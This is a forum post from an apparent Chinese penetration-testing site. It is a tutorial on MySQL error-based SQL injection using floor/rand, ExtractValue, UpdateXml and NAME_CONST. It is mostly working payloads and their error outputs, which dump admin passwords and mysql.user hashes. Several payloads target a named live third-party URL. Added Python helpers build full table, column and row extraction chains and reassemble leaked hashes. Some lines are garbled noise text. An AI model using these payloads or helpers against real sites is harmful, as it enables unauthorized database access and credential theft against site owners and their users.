中国网络渗透测试联盟

Title: Exploiting MySQL error-based injection with floor, ExtractValue and UpdateXml [Print this page]

Author: admin    Time: 2015-11-11 19:03
Title: Exploiting MySQL error-based injection with floor, ExtractValue and UpdateXml

1. Error via floor()

The following payloads can be used. The first needs a table with at least three rows to group over, which is why information_schema.tables is used; the second builds its own three-row derived table with a union:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example:
First, a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is leaked in the duplicate-key message. Note that the trailing "1" is the floor(rand(0)*2) value that concat() appended to the group key, not part of the version string, so strip the last character when reading the result. To read other data, replace version() with a subquery.
For example, to read the administrator username and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id=1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
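Why the floor(rand(0)*2) trick needs at least three rows, shown by re-implementing MySQL's RAND() generator in Python. This is an added example, not code from the original post. The generator is assumed to match the server's my_rnd() as seeded by RAND(0) (it reproduces the well-known floor(rand(0)*2) sequence 0,1,1,0,1,1,0,0), and the GROUP BY model follows the standard explanation that MySQL evaluates the group key once to look it up in the temporary table and again when a new group is inserted. The leaked string is the version from the post's output; the parser at the end strips the appended rand digit from the Duplicate entry message.

```python
import math
import re

MAX_VALUE = 0x3FFFFFFF  # modulus of MySQL's my_rnd() linear congruential generator


class MySQLRand:
    """Model of MySQL's my_rnd() as seeded by RAND(seed).

    Assumption: matches the server's sql_rnd_init()/my_rnd(); the output
    reproduces the known floor(rand(0)*2) sequence 0,1,1,0,1,1,0,0.
    """

    def __init__(self, seed: int = 0) -> None:
        self.seed1 = (seed * 0x10001 + 55555555) % MAX_VALUE
        self.seed2 = (seed * 0x10000001) % MAX_VALUE

    def next(self) -> float:
        self.seed1 = (self.seed1 * 3 + self.seed2) % MAX_VALUE
        self.seed2 = (self.seed1 + self.seed2 + 33) % MAX_VALUE
        return self.seed1 / MAX_VALUE


def floor_rand0_sequence(n: int) -> list:
    """First n values of floor(rand(0)*2) as MySQL would produce them."""
    r = MySQLRand(0)
    return [math.floor(r.next() * 2) for _ in range(n)]


def simulate_group_by(nrows: int, leak: str = "5.1.33-community-log"):
    """Model of GROUP BY concat(leak, floor(rand(0)*2)) over nrows rows.

    MySQL computes the group key to look it up in the temporary table; if the
    group does not exist yet it computes the key again to insert the row.
    With a non-deterministic key the inserted value can differ from the one
    looked up, and the unique index on the temp table raises ERROR 1062.
    Returns the duplicated key (what the error message leaks) or None.
    """
    r = MySQLRand(0)
    groups = {}
    for _ in range(nrows):
        key = leak + str(math.floor(r.next() * 2))   # evaluated for the lookup
        if key in groups:
            groups[key] += 1
            continue
        key = leak + str(math.floor(r.next() * 2))   # re-evaluated for the insert
        if key in groups:
            return key          # MySQL: Duplicate entry '<key>' for key 'group_key'
        groups[key] = 1
    return None


DUP_ENTRY = re.compile(r"Duplicate entry '(.*)' for key '")


def parse_duplicate_entry(error_message: str):
    """Extract the leaked value from ERROR 1062, dropping the trailing
    rand digit that concat() appended to the group key."""
    m = DUP_ENTRY.search(error_message)
    if not m:
        return None
    return m.group(1)[:-1]


if __name__ == "__main__":
    print(floor_rand0_sequence(8))                  # [0, 1, 1, 0, 1, 1, 0, 0]
    for n in (1, 2, 3):
        print(n, "row(s):", simulate_group_by(n))   # None, None, '5.1.33-community-log1'
    msg = "ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'"
    print(parse_duplicate_entry(msg))               # 5.1.33-community-log
```

With one or two rows the first lookup key (…0) is never seen again, so no collision occurs; the third row looks up …0, misses, and re-evaluates to …1, which already exists. That is why the second payload on this page unions exactly three rows.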

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

The 0x5c ('\') prefix makes the XPath expression invalid from its first character, so the whole value appears in the error. The XPATH syntax error shows at most 32 characters, so longer values (password hashes, concatenated rows) have to be read in pieces with substring().

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
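Both XPath functions (ExtractValue and UpdateXml above) show at most 32 characters of the offending expression in the XPATH syntax error, so anything longer must be read in pieces. The following Python helper is an added example, not code from the original post: it builds one substring() payload per 31-character window (the marker byte takes the 32nd), parses the leaked chunk out of each error message and reassembles the value. The marker 0x7e ('~') is used instead of the post's 0x5c and 0x3a; any byte that cannot start an XPath expression works. The target subquery is a placeholder and the server responses are constructed to match the error format shown above.

```python
import re

XPATH_ERROR_LIMIT = 32          # characters MySQL shows in "XPATH syntax error: '...'"
MARKER = "~"                    # 0x7e: not a valid XPath start, so parsing fails at once
CHUNK = XPATH_ERROR_LIMIT - len(MARKER)   # data characters visible per request (31)


def extractvalue_payloads(subquery: str, total_len: int, func: str = "extractvalue") -> list:
    """Build one payload per 31-character window of the subquery result.

    func may be "extractvalue" or "updatexml"; both raise the same error and
    both truncate it to 32 characters. The marker forces the error to start
    at our data instead of somewhere inside it.
    """
    payloads = []
    for start in range(1, total_len + 1, CHUNK):   # SQL substring() is 1-indexed
        piece = f"substring(({subquery}),{start},{CHUNK})"
        if func == "extractvalue":
            expr = f"extractvalue(1,concat(0x7e,{piece}))"
        elif func == "updatexml":
            expr = f"updatexml(1,concat(0x7e,{piece}),1)"
        else:
            raise ValueError(func)
        payloads.append(f" and {expr}")
    return payloads


XPATH_ERROR = re.compile(r"XPATH syntax error: '(.*)'")


def parse_xpath_error(error_message: str) -> str:
    """Return the leaked chunk from an ERROR 1105 message, or '' if absent
    (a missing marker means the error did not come from our payload)."""
    m = XPATH_ERROR.search(error_message)
    if not m or not m.group(1).startswith(MARKER):
        return ""
    return m.group(1)[len(MARKER):]


def reassemble(error_messages: list) -> str:
    """Concatenate the chunks leaked by successive payloads, in order."""
    return "".join(parse_xpath_error(msg) for msg in error_messages)


# Constructed demo: a 41-character MySQL password hash read in two requests.
SAMPLE_HASH = "*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82"


def demo_hash_split():
    subq = "select password from mysql.user limit 0,1"   # placeholder target
    payloads = extractvalue_payloads(subq, len(SAMPLE_HASH))
    # Constructed server responses: what the server would show for each chunk.
    responses = [
        f"ERROR 1105 (HY000): XPATH syntax error: '{MARKER}{SAMPLE_HASH[i:i + CHUNK]}'"
        for i in range(0, len(SAMPLE_HASH), CHUNK)
    ]
    return payloads, reassemble(responses)


if __name__ == "__main__":
    payloads, recovered = demo_hash_split()
    for p in payloads:
        print(p)
    print(recovered == SAMPLE_HASH, recovered)
```

When the total length is unknown, send a first payload with length((subquery)) and read the number back the same way, then size the windows from that.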



Further collected material (joining two derived tables that each carry a column named by name_const() produces the same duplicate-column error):

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
- R0 Y# }- h8 }9 ]* F- h) q4 L, C2 q# F  u8 k
Error-based injection on newer MySQL versions: using NAME_CONST

It's been a while since I've made an SQL injection tutorial, so I thought I should make a new one using the NAME_CONST method. There are not many papers documenting this method, so it feels kind of good to be the one to write a guide for it.
( r( l  @# w+ ?: N; Y
: ^% N: o2 F5 d+ I7 B% Q: c# [
Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything older than that.

Code:
NAME_CONST(name, value)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)
7 D6 D1 _# d8 I9 ?+ `, B! W* C' h2 v3 q
+------+
| TEST |
+------+
|    1 |
+------+

http://dev.mysql.com/doc/refman/5.0/en/m...name-const

Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261
Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = your MySQL variable (the + signs are URL-encoded spaces).

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'
Now, I've tried a couple of sites, and I was getting invalid calls to NAME_CONST when trying to extract data. Nothing was wrong with my syntax; it just wouldn't work there. Luckily, it works here, so let's get this going again...
Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a "Duplicate column name '1'" error:

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'
Now let's get the tables out.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'

Increase the LIMIT offset (limit 1,1, limit 2,1, ...) to enumerate the remaining tables one per request.
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

0xHEX_OF_TABLENAME is the table name as a hex literal (0x75736572 for user), which keeps quote characters out of the payload.

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'
Time to finish it off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

0x207e20 is " ~ ", the separator placed between the two columns so the leaked row can be split again.

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
And there we have it, thanks for reading.
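The table, column and row steps above are one procedure, so here is a single Python helper that generates the whole NAME_CONST chain and reads the results back. It is an added example, not code from the original tutorial; the payload strings use plain spaces rather than the URL-encoded + signs, the schema and table names are the ones from the walkthrough, and the error message at the end is constructed in the format shown above. One caveat the original author ran into: NAME_CONST is documented to take constant arguments, and many server versions reject a subquery there with "Incorrect arguments to NAME_CONST", so expect this chain to work only on some builds and fall back to the floor or XPath techniques elsewhere.

```python
import re


def hex_literal(s: str) -> str:
    """Encode a string as a MySQL 0x... literal so the payload needs no quotes
    (the tutorial writes table_name=0x75736572 for 'user' for this reason)."""
    return "0x" + s.encode("utf-8").hex()


def name_const_payload(inner_select: str) -> str:
    """Wrap a scalar subquery in the duplicate-column NAME_CONST trick.

    Two columns with the same NAME_CONST name in a derived table make MySQL
    raise "Duplicate column name '<value>'", leaking the value. The subquery
    must return exactly one row, hence the callers' LIMIT n,1.
    """
    col = f"NAME_CONST(({inner_select}),1)"
    return f" and 1=(select * from (select {col},{col}) as x)--"


def table_payload(index: int) -> str:
    """index-th table of the current database."""
    return name_const_payload(
        "select table_name from information_schema.tables "
        f"where table_schema=database() limit {index},1")


def column_payload(schema: str, table: str, index: int) -> str:
    """index-th column of schema.table, with names passed as hex literals."""
    return name_const_payload(
        "select column_name from information_schema.columns "
        f"where table_schema={hex_literal(schema)} and table_name={hex_literal(table)} "
        f"limit {index},1")


def row_payload(table: str, columns: list, index: int, sep: str = " ~ ") -> str:
    """index-th row of table, columns joined with sep (sent as a hex literal)."""
    cols = ",".join(columns)
    return name_const_payload(
        f"select concat_ws({hex_literal(sep)},{cols}) from {table} limit {index},1")


DUP_COLUMN = re.compile(r"Duplicate column name '([^']*)'")


def parse_duplicate_column(error_message: str):
    """Leaked value from the Duplicate column name error, or None."""
    m = DUP_COLUMN.search(error_message)
    return m.group(1) if m else None


def split_row(value: str, sep: str = " ~ ") -> list:
    """Undo the concat_ws() join of a leaked row."""
    return value.split(sep)


if __name__ == "__main__":
    print(hex_literal("mysql"), hex_literal("user"))   # 0x6d7973716c 0x75736572
    print(table_payload(0))
    print(column_payload("mysql", "user", 0))
    print(row_payload("mysql.user", ["User", "Password"], 0))
    # Constructed response in the format shown in the tutorial:
    err = "Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'"
    print(split_row(parse_duplicate_column(err)))   # ['root', '*B7B1A4F4...']
```

Loop the index argument of each *_payload function from 0 until the server stops returning a duplicate-column error; that is the end of the table, column or row list.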





Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2